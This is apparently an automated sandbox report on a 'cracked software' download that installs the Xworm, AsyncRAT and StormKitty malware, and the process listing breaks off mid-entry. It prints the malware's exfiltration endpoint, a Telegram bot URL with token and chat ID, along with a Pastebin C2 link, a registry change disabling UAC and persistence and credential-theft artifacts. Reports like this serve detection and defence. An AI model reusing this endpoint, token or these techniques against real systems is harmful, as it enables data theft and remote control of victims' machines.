asyncrat | hxxps://crackia[.]com/topic/91908-exm-tweaking-utility-premium-v10-cracked/

Analysis

max time kernel
150s
max time network
157s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
28-09-2024 22:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://crackia.com/topic/91908-exm-tweaking-utility-premium-v10-cracked/

Score

10^/10

asyncrat stormkitty xworm default discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%LocalAppData%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
telegram
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002a99e-540.dat	family_xworm
behavioral1/memory/3880-591-0x0000000000220000-0x000000000024A000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002a99f-568.dat	family_stormkitty
behavioral1/memory/2816-596-0x0000000000800000-0x000000000083E000-memory.dmp	family_stormkitty

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000100000002a99f-568.dat	family_asyncrat

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 4 IoCs

pid	Process
2104	EXMservice.exe
3880	msedge.exe
2816	svchost.exe
4596	msedge.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\d7759a127482d4c9355f359847fcb713\Admin@AAPRWBJV_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
111	pastebin.com
2	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2420	powershell.exe
1708	powershell.exe
3104	powershell.exe
2656	powershell.exe
2752	powershell.exe
2512	powershell.exe
3872	powershell.exe
4516	powershell.exe
3584	powershell.exe
1648	powershell.exe
2220	powershell.exe
4220	powershell.exe
1896	powershell.exe
3408	powershell.exe
2804	powershell.exe
4580	powershell.exe
440	powershell.exe
3584	powershell.exe
4456	powershell.exe
408	powershell.exe
3916	powershell.exe
4728	powershell.exe
276	powershell.exe
4908	powershell.exe
1680	powershell.exe
4520	powershell.exe
2332	powershell.exe
1184	powershell.exe
1900	powershell.exe
4000	powershell.exe
1576	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1740	netsh.exe
2968	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe

Delays execution with timeout.exe 28 IoCs

evasion

pid	Process
2672	timeout.exe
1828	timeout.exe
4668	timeout.exe
3364	timeout.exe
3360	timeout.exe
3972	timeout.exe
4332	timeout.exe
3276	timeout.exe
1932	timeout.exe
1400	timeout.exe
1816	timeout.exe
492	timeout.exe
488	timeout.exe
2956	timeout.exe
2652	timeout.exe
2756	timeout.exe
5076	timeout.exe
2932	timeout.exe
3600	timeout.exe
2732	timeout.exe
3420	timeout.exe
1292	timeout.exe
1728	timeout.exe
1972	timeout.exe
3144	timeout.exe
3508	timeout.exe
1580	timeout.exe
1992	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133720375702281175"	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat:Zone.Identifier	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2376	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3880	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4052	chrome.exe
4052	chrome.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
3880	msedge.exe
2816	svchost.exe
2816	svchost.exe
2816	svchost.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3880	msedge.exe
3408	powershell.exe
3408	powershell.exe
1680	powershell.exe
1680	powershell.exe
1708	powershell.exe
1708	powershell.exe
4220	powershell.exe
4220	powershell.exe
4520	powershell.exe
4520	powershell.exe
2332	powershell.exe
2332	powershell.exe
3104	powershell.exe
3104	powershell.exe
3872	powershell.exe
3872	powershell.exe
1184	powershell.exe
1184	powershell.exe
4456	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe
Token: SeShutdownPrivilege	4052	chrome.exe
Token: SeCreatePagefilePrivilege	4052	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3880	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4052 wrote to memory of 4552	4052	chrome.exe	78
PID 4052 wrote to memory of 4552	4052	chrome.exe	78
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 3656	4052	chrome.exe	79
PID 4052 wrote to memory of 4792	4052	chrome.exe	80
PID 4052 wrote to memory of 4792	4052	chrome.exe	80
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81
PID 4052 wrote to memory of 2952	4052	chrome.exe	81

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://crackia.com/topic/91908-exm-tweaking-utility-premium-v10-cracked/
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe9d2bcc40,0x7ffe9d2bcc4c,0x7ffe9d2bcc58
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1844 /prefetch:2
  2⤵
  PID:3656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2148,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2348 /prefetch:8
  2⤵
  PID:2952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3108 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4120,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4324 /prefetch:1
  2⤵
  PID:3708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3100,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4116 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4844 /prefetch:8
  2⤵
  PID:4568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4884,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:4584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4144,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3136 /prefetch:1
  2⤵
  PID:3080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3468,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4848 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5176,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4520 /prefetch:1
  2⤵
  PID:872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3440,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:1292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5264,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:1580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5152,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:2660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5816,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5824 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3200,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5832 /prefetch:8
  2⤵
  PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
